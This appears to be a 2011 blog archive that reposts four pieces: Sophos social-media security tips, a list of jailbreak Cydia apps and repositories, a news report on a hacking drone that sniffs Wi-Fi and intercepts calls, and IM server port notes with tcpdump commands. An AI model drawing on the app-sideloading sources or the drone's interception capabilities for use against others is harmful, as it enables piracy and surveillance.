Facebook has its own Facebook Security page. But we also recommend reviewing the Sophos best practice guidelines for Facebook privacy settings with your organization’s staff and setting up ongoing security training and awareness. You can also keep up to date with the real threats on Facebook by encouraging all users to join the Sophos Facebook page. Our Facebook page alerts you to the latest rogue applications, scams and malware attacks threatening social network users. You can also learn how to clean up your Facebook profile after a survey scam in this Sophos YouTube video.

Facebook security best practices: A summary

  • Adjust Facebook Privacy settings
  • Read the Facebook Guide to Privacy
  • Think carefully about choosing your friends
  • Show “limited friends” a cut-down version of your profile
  • Disable options, then open them one by one

If you’re a victim of rogue Twitter applications, you can remove their rights by going to the Twitter website and visiting Settings/Applications and revoking the offending app’s rights. Twitter also has a Safety Center within its Help center and blog posts on how to Avoid Phishing Scams. You can get regular status updates on Twitter by following @safety and @spam. And, be sure to follow @SophosLabs to get regular updates to protect your business.

LinkedIn’s blog discusses security issues and includes posts such as Protecting yourself from hackers and Quick tips on Security and Privacy.

Consider working with your communications team to put a Social Media Policy in place for your company that includes not only how to communicate using social media, but also how to protect yourself on these sites. Also realize that some sites let you broadcast your messages between different social networks. For instance, you can choose to have all of your LinkedIn updates also sent out as tweets, but remember that your audience on Twitter can be anyone, whereas only your own network can view LinkedIn updates.

Finally, keep your antivirus software up to date, install the latest security patches, and if you're looking for news, go to legitimate news websites rather than clicking on a link sent by a friend.

For more information or to read the Sophos Security Threat Report Mid-Year 2011 in its entirety, download now.



Jailbreak Apps

Hacking 2011. 8. 9. 09:43

February 10, 2011 - By æ

You may have seen yesterday’s GSL post listing twenty must-have apps for new Verizon iPhone users. The list included apps that were approved by Apple and, as a result, available in the traditionally used App Store. As most iPhone users know, there is another side to the app world. Known to the world as Cydia, it is much like an alternate dimension containing its own treasure trove of apps that Apple would never consider approving, because they use the jailbroken infrastructure to bypass the restrictions on functionality and use that Apple has deemed necessary.

We’re not discussing the how-to or ethics of jailbreaking with Greenpois0n or any other tool. We’re not debating the potential impact of invalidating your warranty with Apple. We’re also not going to discuss things like Hackulous or how to jailbreak your device. These are all things you can research on your own, in order to make the decision that best suits you. The list of apps is provided with the assumption that you’ve already jailbroken your new Verizon (or AT&T) iPhone and want to know which apps have the greatest potential to make your iPhone life better.

We’re keeping it simple by listing each app’s name and a brief description of what the author states is its function. Some apps may have a price associated with them; you’ll be informed if they do, prior to installing them. Additionally, please be sure to read the advisories and disclaimers at the bottom of the post before installing anything:

  • MyOs – Allows enabling/disabling of features (e.g. multitasking, Unified iPod, etc.) without editing .plist files
  • FastSnap – Allows the hardware volume button to be used as camera/video controls
  • qTweeter - Update and read Facebook and Twitter status. Activates with a swipe of the status bar.
  • Folder Enhancer – Provides more granular control over folders, the number of allowable icons, creation of subfolders, and hiding of folders.
  • Grid Tab for Safari – Allows open tabs within Safari to be displayed in a grid pattern, versus requiring left/right scrolling to view them.
  • AppSync for iOS 4.1/4.2 – Allows for manual installation of .ipa files. (Read: Install apps without using iTunes.)
  • biteSMS – Enhanced SMS messaging app that includes privacy, emoticon, signatures, delivery reports and more.
  • CyDelete - Allows for the deletion of Cydia-installed apps via the normal iPhone app hold & tap deletion method, instead of opening Cydia to delete it.
  • Five Icon Dock – Lets you place five icons in the iPhone dock, versus the default four.
  • Five-Column Springboard – Arranges apps in rows of five icons on your iPhone, versus the default four.
  • Gridlock – Allows you to place your icons anywhere and in the pattern of your choice, instead of four to a row.
  • Home Page in Safari – Easily reset your homepage within Safari for iPhone by tapping the “+” icon.
  • iFile for iOs4 – Access, manage and edit the file system on your iPhone to control features like multitasking, wallpapers, battery percentage, etc.
  • Infinifolders – Allows you to add more than the default twelve apps within a folder and navigate within folders via vertical scroll.
  • Fake Operator – Adds a sub-menu within Settings, which can be accessed to change the carrier from the default to a customized one.
  • MobileTerminal 426 – Terminal emulator for the iPhone providing traditional system administration functions. (Read: Experts only)
  • MobileVolumeSound – Adds the traditional Mac volume sound when raising/lowering the iPhone’s volume.
  • OpenSSH – Allows you to connect to your iPhone, via SSH, over WiFi, in order to transfer files to/from it.
  • Remove Recents – Removes icons of apps from the Multitasking Drawer (what you see when you double-tap the Home button) if the app doesn’t support multitasking.
  • SBSettings – Allows you to access common settings (e.g. Enable 3G, WiFi, etc) and functions (e.g. Take screenshot) via customized screen swipes, taps, double-taps, etc.
  • Serious SBSettings HD – Optimized Retina theme for SBSettings
  • UserAgent Faker - Similar to the Safari Developer Tools for Mac, which allow you to emulate another browser such as Firefox.
  • 3G Unrestrictor – Allows you to configure traditionally WiFi-only apps like FaceTime to function on 3G. Also allows for bypassing of 10Mb size limits in App Store downloads.
  • FullScreen Safari – Allows for toggling of Safari browser into full screen mode and includes support for multi-touch gestures.
  • Apple.com HD SBSettings – Customized theme for SBSettings that makes it resemble the clean Apple.com website.
  • Open Notifier - Adds notification icons to the iPhone’s status bar.
  • Shrink – Allows you to decrease the size of your iPhone icons to achieve a cleaner and less cluttered look.
  • SB 2 Cloud – Lets users configure screenshots to be uploaded in the background to Cloud app immediately upon taking them and automatically copies the shortened URL to the clipboard for easy sharing.
  • Voice Activator - Enhances the iPhone’s voice-activated command functionality by allowing the use of voice commands to open apps, navigate to websites, toggle options like WiFi, Bluetooth, and Airplane mode, reboot the device and take screenshots.
  • BytaFont – Allows for the customization of display fonts on the iPhone, versus using the default, built-in font.
  • TV Tube Sleep – Customizes the behavior of the iPhone when the Sleep button is pressed by displaying an animation that resembles an old 20th-century tube television set turning off.
  • My3G – Provides the same functionality provided by 3G Unrestrictor, as described above in the list.
  • MyWi 4.0 – Allows iPhone users to share their device’s 3G connection via WiFi or USB/Bluetooth tethering and supports unencrypted and encrypted sharing. (Note: To be used cautiously if not on an unlimited data plan)
  • AdBlocker – Blocks ads from appearing in Safari, as well as within apps that include advertisements.

In order to find some of these apps, users may need to add some or all of the following repositories within Cydia. The lifespan of repositories is often unpredictable, so some that are available now may not be in the near future. Since they must be added manually and only work within Cydia, they are purposely not hyperlinked:

  • http://repo.benm.at/
  • http://cydia.myrepospace.com/atomicmufin
  • http://cydia.bitesms.com/cydia/beta5.1
  • http://cydia.hackulo.us
  • http://cydia.myrepospace.com/iHaxer
  • http://repo.insanelyi.com
  • http://sinfuliphonerepo.com
  • http://www.themeitapp.com
  • http://kuaidial.googlecode.com/svn/deb

As usual, it’s “Buyer Beware” with any app installed via Cydia. By installing it, the user is assuming that the package will do what its description says and won’t create problems with their device. Unfortunately, some apps may cause conflicts and not function as expected. If a user installs one and finds this to be the case, they should remove the package by navigating to “Manage” > “Packages” > (tap the app to be uninstalled) > “Modify” > “Remove”. The same procedure applies to an app which may cause the device to crash once activated.

Users are encouraged to research the app prior to paying for and/or installing it on their iPhone. More information can be found on each one at http://cydia.saurik.com/.


Editor’s Note: A big thanks goes out to @aelphae, @iWG83 and their collaborative-minded friends for taking the time to compile this list of the best Cydia apps. It’s people like them that make things easier for new iPhone users to get the most out of their devices.

Disclaimer: Neither Geek Shui Living nor its contributors endorse or encourage the practice of jailbreaking. As always, iPhone and iPod Touch owners are reminded that jailbreaking their devices is legal but does effectively void the manufacturer’s warranty, could render their device temporarily useless if something goes wrong and should not be attempted by anyone. Yes, that means you, too.

Wardriving Evolves Into Warflying

Researchers release specs for a DIY radio-controlled plane that hacks systems by air

Aug 04, 2011 | 01:48 PM

By Ericka Chickowski, Contributing Editor
Dark Reading


BLACK HAT USA 2011 -- Las Vegas -- Yesterday at Black Hat, two security researchers demonstrated how a radio-controlled model airplane outfitted with a computer and 4G connectivity could be used to create a nearly undetectable aerial hacking device that could perpetrate aerial attacks on targets otherwise unreachable by land.

Created completely with off-the-shelf equipment and open-source software -- and with a budget of only about $6,100 -- the demo plane they brought on stage with them was capable of wireless network sniffing and cracking, cell tower spoofing, cell phone tracking and call interception, data exfiltration, and video surveillance.


"There is some really evil stuff you can do from the sky," said Mike Tassey, who together with Richard Perkins spent more than 1,300 hours building, testing, and refining the device they call the Wireless Aerial Surveillance Platform (WASP).

Built on top of a surplus Army target drone Perkins had sitting in his basement, the device has been equipped with multiple wireless antennae and a microcomputer loaded with GPS, wireless sniffing tools, and the Backtrack 5 penetration testing toolkit. The 14-pound, 6-foot-long plane connects through a 4G dongle with a small base station that controls it using Google Earth and an open-source autopilot software solution. The base station streams data gathered by the plane and sends it over a VPN connection to a more robust back-end PC, which can take care of the heavy-lifting, such as crunching through large dictionaries to perform brute-force attacks. The Internet connectivity would make it possible to also crowdsource data to multiple hackers with different skill sets if a project needed the manpower.

The plane itself is powered by an electric motor that is hard to detect by ear even from as close as 50 feet away. Though FAA regulations prohibit flying such devices above 400 feet, the drone itself would be capable of reaching well above 20,000 feet in altitude.

Perkins and Tassey said a device such as the one they developed could potentially be used for a number of nefarious reasons beyond run-of-the-mill hacking, including drug trafficking and terrorism. On the plus side, such drones could also be used by forces of good, including for search and rescue, military and law enforcement operations, and even to provide emergency cellular service in disaster zones. Whether built for good or bad, the design is not complicated, they said.

"You don't need a Ph.D. from MIT to do this," Perkins said.

Unfortunately, both presenters said they couldn't yet think of a good way to protect against a WASP-like attack. Not even missiles would work against these drones because they don't put out the kind of heat or radar signatures necessary for missiles to track and destroy them.

"So how do you defend against this? I don't know. That's what you guys are for. We need the right people to start thinking about this. How would you defend against something like this?" Perkins said. "Because if we thought of it, someone else has, too. They're just not telling you about it."



IM Server

Hacking 2011. 8. 3. 08:23

IM Server
The IM server maintains the directory of user accounts, keeps track of who is online, and, in most cases, routes messages among users. The IM server operates in real time, sending messages back and forth between two users as they finish typing each line of text. The servers also pass real-time information about the availability of various users in the directory, such as when they come online or change their status message.

Each IM server communicates with its clients over an assigned port number across the Internet. IM clients, however, can log in using other ports when the default port is blocked by a deny policy. Typical port numbers include those shown in the following table:
IM Application – Service Port Numbers – Proxies

  • AIM – 5190 – SOCKS 4, SOCKS 5, HTTP, HTTPS
  • ICQ – 5190 – (proxies not listed)
  • Yahoo! Messenger (YMSG) – 5050 (also 443 and 80) [1] – SOCKS 4, SOCKS 5, HTTP
  • MSN Messenger – 1863 – SOCKS 4, SOCKS 5, HTTP

[1] In addition to port 5050, make sure traffic is permitted on ports 443 (HTTPS) and 80 (HTTP).
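As a quick cross-check (a sketch only, reusing the tcpdump commands covered earlier in this blog; eth1 is an assumed interface name), you can watch whether clients are actually using these default ports:

# tcpdump -ni eth1 port 1863
# tcpdump -ni eth1 port 5190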
